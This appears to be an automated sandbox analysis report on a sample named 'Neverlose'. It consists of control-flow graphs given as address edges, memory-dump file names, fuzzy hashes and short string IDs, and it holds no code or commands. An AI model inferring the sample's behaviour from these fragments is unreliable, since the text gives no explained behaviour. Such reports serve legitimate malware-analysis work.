                                                                control_flow_graph 779 2e71160-2e7116d 780 2e71176-2e71186 779->780 781 2e7116f-2e71171 779->781 783 2e7118d-2e7119d 780->783 784 2e71188 780->784 782 2e71415-2e7141c 781->782 786 2e711a3-2e711b1 783->786 787 2e713fc-2e7140a 783->787 784->782 790 2e711b7 786->790 791 2e7141d-2e71496 786->791 787->791 792 2e7140c-2e71410 call 2e701e8 787->792 790->791 794 2e712e7-2e7130f 790->794 795 2e71222-2e71243 790->795 796 2e71381-2e713ad 790->796 797 2e713af-2e713ca call 2e701d8 790->797 798 2e7126e-2e7128f 790->798 799 2e713cc-2e713ee 790->799 800 2e71248-2e71269 790->800 801 2e71356-2e7137c 790->801 802 2e711d5-2e711f6 790->802 803 2e71294-2e712b5 790->803 804 2e71314-2e71351 790->804 805 2e713f0-2e713fa 790->805 806 2e711be-2e711d0 790->806 807 2e711fb-2e7121d 790->807 808 2e712ba-2e712e2 790->808 792->782 794->782 795->782 796->782 797->782 798->782 799->782 800->782 801->782 802->782 803->782 804->782 805->782 806->782 807->782 808->782
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xbq$$^q
                                                                • API String ID: 0-1593437937
                                                                • Opcode ID: 56e55044b7a00611cf3bec605ff39e7b13dbc605de10f1f4e2317c9172d4c27a
                                                                • Instruction ID: 1bd54033b247bff1013c9386dee7beccdd178cbb25c0be8b49c80967314e7d5c
                                                                • Opcode Fuzzy Hash: 56e55044b7a00611cf3bec605ff39e7b13dbc605de10f1f4e2317c9172d4c27a
                                                                • Instruction Fuzzy Hash: 14818F74F402189BDB58EF7898546BE7BB7BBC8711B14C939D40AEB388DE348C029795

                                                                Control-flow Graph

                                                                control_flow_graph 126 2e72bc8-2e72c93 call 2e723fc 138 2e72ecd-2e72ed6 126->138 139 2e72c99-2e72ca0 126->139 143 2e72eed 138->143 144 2e72ed8-2e72ee5 138->144 139->138 140 2e72ca6-2e72cad 139->140 140->138 142 2e72cb3-2e72cc7 140->142 195 2e72cc9 call 2e72f03 142->195 196 2e72cc9 call 2e72f18 142->196 149 2e72eee 143->149 144->143 145 2e72ccf-2e72cd3 146 2e72cd5-2e72cd9 145->146 147 2e72d0e-2e72d3c 145->147 146->138 150 2e72cdf-2e72d0b 146->150 156 2e72d40-2e72d4c 147->156 157 2e72d3e 147->157 149->149 150->147 159 2e72d4e-2e72d7a call 2e727d0 156->159 157->159 166 2e72d82-2e72d85 159->166 167 2e72d8b-2e72e05 166->167 168 2e72e89 166->168 170 2e72e8e 167->170 183 2e72e0b-2e72e12 167->183 168->170 172 2e72e93-2e72e97 170->172 173 2e72eae 172->173 174 2e72e99-2e72ea6 172->174 173->138 174->173 183->170 184 2e72e14-2e72e1b 183->184 184->170 185 2e72e1d-2e72e3d 184->185 187 2e72e50-2e72e54 185->187 188 2e72e3f-2e72e43 185->188 190 2e72e56-2e72e5a 187->190 191 2e72e64-2e72e87 187->191 188->170 189 2e72e45-2e72e4d 188->189 189->187 190->170 192 2e72e5c 190->192 191->172 192->191 195->145 196->145
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q$PH^q$Te^q$XX^q$XX^q
                                                                • API String ID: 0-427891639
                                                                • Opcode ID: e9ae62f8fc8de98cdf6e87afa11bb80ac67b7517706e34339be232fba85005b2
                                                                • Instruction ID: 5081a9680a5108f9313d92a413dbc463388ce1665c4e976537585ba7a2618e57
                                                                • Opcode Fuzzy Hash: e9ae62f8fc8de98cdf6e87afa11bb80ac67b7517706e34339be232fba85005b2
                                                                • Instruction Fuzzy Hash: 6481E130F402449FD728AB79D89876EBAE3BBC4304F24C86DD5569B398CB359C85CB91

                                                                Control-flow Graph

                                                                control_flow_graph 197 2e75fa0-2e7648e 272 2e76494-2e764a4 197->272 273 2e769e0-2e76a15 197->273 272->273 274 2e764aa-2e764ba 272->274 278 2e76a17-2e76a1c 273->278 279 2e76a21-2e76a3f 273->279 274->273 275 2e764c0-2e764d0 274->275 275->273 277 2e764d6-2e764e6 275->277 277->273 280 2e764ec-2e764fc 277->280 281 2e76b06-2e76b0b 278->281 290 2e76ab6-2e76ac2 279->290 291 2e76a41-2e76a4b 279->291 280->273 283 2e76502-2e76512 280->283 283->273 284 2e76518-2e76528 283->284 284->273 286 2e7652e-2e7653e 284->286 286->273 287 2e76544-2e76554 286->287 287->273 289 2e7655a-2e7656a 287->289 289->273 292 2e76570-2e769df 289->292 297 2e76ac4-2e76ad0 290->297 298 2e76ad9-2e76ae5 290->298 291->290 296 2e76a4d-2e76a59 291->296 307 2e76a7e-2e76a81 296->307 308 2e76a5b-2e76a66 296->308 297->298 304 2e76ad2-2e76ad7 297->304 305 2e76ae7-2e76af3 298->305 306 2e76afc-2e76afe 298->306 304->281 305->306 317 2e76af5-2e76afa 305->317 306->281 309 2e76a83-2e76a8f 307->309 310 2e76a98-2e76aa4 307->310 308->307 319 2e76a68-2e76a72 308->319 309->310 321 2e76a91-2e76a96 309->321 313 2e76aa6-2e76aad 310->313 314 2e76b0c-2e76b5b call 2e76ccf 310->314 313->314 318 2e76aaf-2e76ab4 313->318 327 2e76b61-2e76b68 314->327 317->281 318->281 319->307 325 2e76a74-2e76a79 319->325 321->281 325->281 329 2e76b7b-2e76b86 327->329 330 2e76b6a-2e76b75 327->330 335 2e76c57-2e76c86 329->335 336 2e76b8c-2e76bfb 329->336 330->329 334 2e76bfe-2e76c50 330->334 334->335
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q
                                                                • API String ID: 0-355816377
                                                                • Opcode ID: bbc0ae04281a26346967f378526dfe96eab8fa6c8211157c685bedc62f71f11c
                                                                • Instruction ID: 3d0500ea46961365de2ec401e15f92f6bd2d5914e00fa363c5f9e942bd25f59d
                                                                • Opcode Fuzzy Hash: bbc0ae04281a26346967f378526dfe96eab8fa6c8211157c685bedc62f71f11c
                                                                • Instruction Fuzzy Hash: 1F624174A40258CFDB14DBA4C860B9EBB77EF88300F2081A9D50A6B3A5DF359D85DF51

                                                                Control-flow Graph

                                                                control_flow_graph 671 2e737f8-2e7381a 672 2e73830-2e7383b 671->672 673 2e7381c-2e73820 671->673 676 2e738e3-2e7390f 672->676 677 2e73841-2e73843 672->677 674 2e73822-2e7382e 673->674 675 2e73848-2e7384f 673->675 674->672 674->675 679 2e73851-2e73858 675->679 680 2e7386f-2e73878 675->680 684 2e73916-2e7396e 676->684 678 2e738db-2e738e0 677->678 679->680 682 2e7385a-2e73865 679->682 776 2e7387a call 2e737e9 680->776 777 2e7387a call 2e737f8 680->777 682->684 685 2e7386b-2e7386d 682->685 683 2e73880-2e73882 686 2e73884-2e73888 683->686 687 2e7388a-2e73892 683->687 703 2e73970-2e73976 684->703 704 2e7397d-2e7398f 684->704 685->678 686->687 689 2e738a5-2e738c4 call 2e740f0 686->689 690 2e73894-2e73899 687->690 691 2e738a1-2e738a3 687->691 697 2e738c6-2e738cf 689->697 698 2e738d9 689->698 690->691 691->678 774 2e738d1 call 2e75fa0 697->774 775 2e738d1 call 2e75f90 697->775 698->678 700 2e738d7 700->678 703->704 706 2e73995-2e73999 704->706 707 2e73a23-2e73a27 call 2e73baf 704->707 708 2e7399b-2e739a7 706->708 709 2e739a9-2e739b6 706->709 710 2e73a2d-2e73a33 707->710 715 2e739b8-2e739c2 708->715 709->715 711 2e73a35-2e73a3b 710->711 712 2e73a3f-2e73a46 710->712 716 2e73aa1-2e73ae3 711->716 717 2e73a3d 711->717 720 2e739c4-2e739d3 715->720 721 2e739ef-2e739f3 715->721 740 2e73aec-2e73b00 716->740 717->712 732 2e739d5-2e739dc 720->732 733 2e739e3-2e739ed 720->733 722 2e739f5-2e739fb 721->722 723 2e739ff-2e73a03 721->723 726 2e739fd 722->726 727 2e73a49-2e73a9a 722->727 723->712 728 2e73a05-2e73a09 723->728 726->712 727->716 729 2e73b07-2e73b1d 728->729 730 2e73a0f-2e73a21 728->730 739 2e73b1f-2e73b2b 729->739 729->740 730->712 732->733 733->721 742 2e73b31-2e73b33 739->742 743 2e73b2d-2e73b2f 739->743 740->729 748 2e73b35-2e73b39 742->748 749 2e73b44-2e73b46 742->749 747 2e73ba9-2e73bac 743->747 751 2e73b3f-2e73b42 748->751 752 2e73b3b-2e73b3d 748->752 753 2e73b59-2e73b5f 749->753 754 2e73b48-2e73b4c 749->754 
751->747 752->747 758 2e73b61-2e73b88 753->758 759 2e73b8a-2e73b8c 753->759 756 2e73b52-2e73b57 754->756 757 2e73b4e-2e73b50 754->757 756->747 757->747 762 2e73b93-2e73b95 758->762 759->762 764 2e73b97-2e73b99 762->764 765 2e73b9b-2e73b9d 762->765 764->747 767 2e73ba6 765->767 768 2e73b9f-2e73ba4 765->768 767->747 768->747 774->700 775->700 776->683 777->683
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hbq$Hbq
                                                                • API String ID: 0-4258043069
                                                                • Opcode ID: 0635664e999adde8c243eb11ddc973abba425ecc6f15500290a05538f1ed8168
                                                                • Instruction ID: 884cb5fe63d8e4213bb12b784ba3a5b04e7391392416220ae552942e122dc490
                                                                • Opcode Fuzzy Hash: 0635664e999adde8c243eb11ddc973abba425ecc6f15500290a05538f1ed8168
                                                                • Instruction Fuzzy Hash: B6B1DC307802559FDB55AF38D854B6A7BE6ABC8314F1489A9E806CB390DF35CC02EB91

                                                                Control-flow Graph

                                                                • Basic-block graph for the function starting at 2e73d58 (rendered graph data not reproduced)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,bq$,bq
                                                                • API String ID: 0-2699258169
                                                                • Opcode ID: 408a1167165a9bcca6eb8fcc0e70dd91ff19b688f97f6038c17af9fae50ada05
                                                                • Instruction ID: 2987d1a550b23ff765ebb5ec85600ec3e55aa06e70350ede6299f2fceb520c55
                                                                • Opcode Fuzzy Hash: 408a1167165a9bcca6eb8fcc0e70dd91ff19b688f97f6038c17af9fae50ada05
                                                                • Instruction Fuzzy Hash: 0B81BF30B802059FCB58CF69C884AEAB7B2FF89258B14E1AAE405DB3A4D731DC41DB51

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                • Basic-block graph for the function starting at 2e72170, with calls to 2e71160 (rendered graph data not reproduced)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xbq$Xbq
                                                                • API String ID: 0-1243427068
                                                                • Opcode ID: 3c01caab4fc3fbfdd28ca46b44a37d9eeb5df5623c0bc2e9f2643dca713cc8f1
                                                                • Instruction ID: 6ee5f24e1d00395f742e9e7f10ccd076716c1bd6ff785ccd1ff163772417e620
                                                                • Opcode Fuzzy Hash: 3c01caab4fc3fbfdd28ca46b44a37d9eeb5df5623c0bc2e9f2643dca713cc8f1
                                                                • Instruction Fuzzy Hash: DC31F331B842298BDF1C46AA8D9037F66AABBC4348F149439DF0AD7394DF75CC4586A1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                • Basic-block graph for the function starting at 2e75460, with calls to 2e75a50 and 2e74d10 (rendered graph data not reproduced)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o^q
                                                                • API String ID: 0-74704288
                                                                • Opcode ID: 2fb161be7a4dbd2c40f4508202ea5760f5bb48cbc58acc615f414fb46dfcb9ec
                                                                • Instruction ID: c70c0536663e0f440670dcf5f87f25ece18d5faa59ed3a6e8303a88f31f6f9e0
                                                                • Opcode Fuzzy Hash: 2fb161be7a4dbd2c40f4508202ea5760f5bb48cbc58acc615f414fb46dfcb9ec
                                                                • Instruction Fuzzy Hash: 4E126A35A40505CFCB14CF68C584AAABBF2FF88314F55D658E85ADB2A5D730EC81CB61

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                • Basic-block graph for the function starting at 2e7158f (rendered graph data not reproduced)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q
                                                                • API String ID: 0-1614139903
                                                                • Opcode ID: e0f744b2e242d2d55c971276c36469e201ab6b3ce046c934d7e153e3013e409d
                                                                • Instruction ID: 0fe53aaf2e9523088c1dc59b4e24177d9d5e53b9dafe8bba6a71d92de6cc09c6
                                                                • Opcode Fuzzy Hash: e0f744b2e242d2d55c971276c36469e201ab6b3ce046c934d7e153e3013e409d
                                                                • Instruction Fuzzy Hash: A1E18234A40309DFDB15DFB8D584BAE7BB2FB88304F1484A9E809AB364CB369D45CB51

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                • Basic-block graph for the function starting at 2e75c60, with a call to 2e75e80 (rendered graph data not reproduced)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q
                                                                • API String ID: 0-1614139903
                                                                • Opcode ID: c568322db6f23b7ec79c3d46fda68ea766fdc541eacdb32d54216dc75c7e1e97
                                                                • Instruction ID: 3303f5a665655e393d271295a087c642af839bf2e536c97564821d9c6982459e
                                                                • Opcode Fuzzy Hash: c568322db6f23b7ec79c3d46fda68ea766fdc541eacdb32d54216dc75c7e1e97
                                                                • Instruction Fuzzy Hash: E061AE317445018FC714CF39D888ABB7BE5EF4A658789D8AAED16CB2A1EB31DC41CB50

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                • Basic-block graph for the function starting at 2e75a50, with calls to 2e75c60 and 2e75c50 (rendered graph data not reproduced)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q
                                                                • API String ID: 0-1614139903
                                                                • Opcode ID: d5725843a65b0c6f0be8409d4d2320ed9858a666dd8177ea3c2a34e75a7e0510
                                                                • Instruction ID: cc97cbf5816587a4763ad9e44d3cab79e0adb1ff585935e7cff221b596baa008
                                                                • Opcode Fuzzy Hash: d5725843a65b0c6f0be8409d4d2320ed9858a666dd8177ea3c2a34e75a7e0510
                                                                • Instruction Fuzzy Hash: BA416AB56402099FCF15DF28D898BAE7BB5FB88314F508069E906CB3A0C731DD51CBA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                • Basic-block graph for the function starting at 2e72367, with a call to 2e72bc8 (rendered graph data not reproduced)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8bq
                                                                • API String ID: 0-187764589
                                                                • Opcode ID: a523b6288c206476192f395adb6e9e9846556aaaaef3e524d748158a9d2b3fda
                                                                • Instruction ID: 3ed517f936be585b5ea837ffb3be783ca8dd0f9c469b028f70a69b8761f79a01
                                                                • Opcode Fuzzy Hash: a523b6288c206476192f395adb6e9e9846556aaaaef3e524d748158a9d2b3fda
                                                                • Instruction Fuzzy Hash: A4F02073B002400FC324677EE894AAE7BDAFBDA23032040A9E00AC7391CD21CC038B91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                • Basic-block graph for the function starting at 2e72378, with a call to 2e72bc8 (rendered graph data not reproduced)
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8bq
                                                                • API String ID: 0-187764589
                                                                • Opcode ID: 154f3e8e0d98343ee6687d322e274822e674865ecabba37d59e910f09ee3f243
                                                                • Instruction ID: 5c62c6dc4f9d1df973b21d87c8a7d6a7a113adb054b4d2590bb093cba79a624f
                                                                • Opcode Fuzzy Hash: 154f3e8e0d98343ee6687d322e274822e674865ecabba37d59e910f09ee3f243
                                                                • Instruction Fuzzy Hash: 5BE09232B002105B8218677EF88481F77DAFBC96613204479E10AC7360CD71DC0187E1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                • Basic-block graph for the function starting at 1175598, with a call to VirtualAlloc (rendered graph data not reproduced)
                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 011755C3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1727100048.0000000001169000.00000040.00000001.01000000.00000003.sdmp, Offset: 01008000, based on PE: true
                                                                • Associated: 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1727100048.0000000001149000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1727100048.000000000114E000.00000040.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ff0000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 52f65c5d654be1a14dfdd704d0ed2d6f2e9a1ea62ca8d44e28920434b85683e7
                                                                • Instruction ID: 9867b1b1a99cfb98a420549c27cc238a355cb8da85390faf8c4fbdc1c5c00cbd
                                                                • Opcode Fuzzy Hash: 52f65c5d654be1a14dfdd704d0ed2d6f2e9a1ea62ca8d44e28920434b85683e7
                                                                • Instruction Fuzzy Hash: 5AE0ECB5300208ABDB55CD4CD948B6A33AFA748210F108011F609D7345C234E8508B65
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c86267dbb10a857a7556611170531e262d2df510a42b0c90e3e572571336e901
                                                                • Instruction ID: 5a411c3ed41197d5f7997e63c0abcfe0e45f403978948be72a8c287753e2f8a0
                                                                • Opcode Fuzzy Hash: c86267dbb10a857a7556611170531e262d2df510a42b0c90e3e572571336e901
                                                                • Instruction Fuzzy Hash: 03C16F30B95201DFDB18DB60E958B6DBBA2BF44315F20D628E81ADB2D4DF759C42CB50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f4cac3335c8000c878456e92809b42c208adbf34d1b79df7a0ac62c85e5f909d
                                                                • Instruction ID: e63875c5c961d499fba0d7343e7d59b15dd0cc19a1d9f10eadfbaa5f7597575d
                                                                • Opcode Fuzzy Hash: f4cac3335c8000c878456e92809b42c208adbf34d1b79df7a0ac62c85e5f909d
                                                                • Instruction Fuzzy Hash: 78C12871E406189FCB04DF68C988A9DBBF6FF89318B1AD559E415AB361C731EC81CB60
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81ed7f4a49dfd093bb7c9f395fb5866f2484c669bb004ae3faf16af381794e86
                                                                • Instruction ID: 1cde50b6837e479995ea48a968207909ab69bec461867d68071100aed366a4e4
                                                                • Opcode Fuzzy Hash: 81ed7f4a49dfd093bb7c9f395fb5866f2484c669bb004ae3faf16af381794e86
                                                                • Instruction Fuzzy Hash: C2413930B85206DFDB18DB20E958B6E7BA2FF44319F20DA29D816DB2D5DB719C02CB50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 62728c1f68638b40313b0a46267c3f4c70a256eb151e93cd7c65b1399e74b8a6
                                                                • Instruction ID: 994c98715057f3114da08c02818b322cb67c27c9d73a1b692db90eb78804dd69
                                                                • Opcode Fuzzy Hash: 62728c1f68638b40313b0a46267c3f4c70a256eb151e93cd7c65b1399e74b8a6
                                                                • Instruction Fuzzy Hash: D8318D71A4414AAFCB159F69E854AAF3BA6FB88304F108568FE16C7350CB39CD61DB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 63a4571a21890a3915bbe9ecb7f2ae1db2ed4f9b64aed39f87db8f7af5addf9e
                                                                • Instruction ID: 4698eebd66b94bdddcd49124a32492d8fb22151fb5152185cb01bc703101896b
                                                                • Opcode Fuzzy Hash: 63a4571a21890a3915bbe9ecb7f2ae1db2ed4f9b64aed39f87db8f7af5addf9e
                                                                • Instruction Fuzzy Hash: 7521C1717842004BDB291736C45477E669BEFC461CF98D479E80ACB394EB2ACC82DB81
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d14f8eeaee64493ddca91a1ee3a04176ed37522c1f871d432949d1806560acfe
                                                                • Instruction ID: 3db1dbd426ba5f4c69de736ec10f3b47373ea68e0fd019d0ca1869ccd583a4f8
                                                                • Opcode Fuzzy Hash: d14f8eeaee64493ddca91a1ee3a04176ed37522c1f871d432949d1806560acfe
                                                                • Instruction Fuzzy Hash: 01210439781A119FC7259A38D494ABEB7A2EFC8715B1981ACD907CB340CF35DC02CB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d184b974783b0293e1acf434a1c2ca987757fe1399f5d9aa32d57bdec0bab0d
                                                                • Instruction ID: 944bc0ce3a8e965a928b826d845e92976319cb00bc8d8669e9f4942ce17be95c
                                                                • Opcode Fuzzy Hash: 6d184b974783b0293e1acf434a1c2ca987757fe1399f5d9aa32d57bdec0bab0d
                                                                • Instruction Fuzzy Hash: 7B210471A482459FCB159F38E854BAB3FB6EB89314F148069FA46CB340CB38CD51DB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7de94e97cebbc53af56e8ac589ca573800e6efc8fb298a76f415aa9e254befcf
                                                                • Instruction ID: 7a9321287fe34238573d693efa5ee8f1ef5c07e210b0ad2b22a0f2694927e451
                                                                • Opcode Fuzzy Hash: 7de94e97cebbc53af56e8ac589ca573800e6efc8fb298a76f415aa9e254befcf
                                                                • Instruction Fuzzy Hash: 37214230B95245DFDB149B20D959B6E7BA2AF40319F24DA28D416DF2D0DF719C05CB50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ece53d56a2fbfd242c01b54a6d18cbdd225f569e8002047a7c4ac6a99906dd2
                                                                • Instruction ID: c9dfef7aafc000f0828b71c3d34561622c04f45363211b31afab27b466353517
                                                                • Opcode Fuzzy Hash: 3ece53d56a2fbfd242c01b54a6d18cbdd225f569e8002047a7c4ac6a99906dd2
                                                                • Instruction Fuzzy Hash: 6101F531B412109BCB296A3498247AE33E7EB89719F11457DE90ADB380CE779C12CB92
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f4bcba1f4053975214223b7cabd640d95ddfa8c4d5fdabbae35300613a8ad4b5
                                                                • Instruction ID: 4ab09896b1c89746f2f1d7ebf6e0bf4971f8e5c5bbb67e57f0869cacce31f3b8
                                                                • Opcode Fuzzy Hash: f4bcba1f4053975214223b7cabd640d95ddfa8c4d5fdabbae35300613a8ad4b5
                                                                • Instruction Fuzzy Hash: EC0145327002014FCB169378E8503AE7BA3DBC4710F04447DD44AAB380DEBAAC478BA3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 889f7e01c726aa39d3b6b7bdf5ad4713bb98677f12e25b5bf8ab3e47eb859322
                                                                • Instruction ID: 28a1784de55be9af5ab859c77ab2d587bf73c1792bef4d6ab709f38c1b8ccf3d
                                                                • Opcode Fuzzy Hash: 889f7e01c726aa39d3b6b7bdf5ad4713bb98677f12e25b5bf8ab3e47eb859322
                                                                • Instruction Fuzzy Hash: 86012831B412108BCB296A3498247AE33E7EB89719F11047DE90ADB380CE77DC02CB91
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
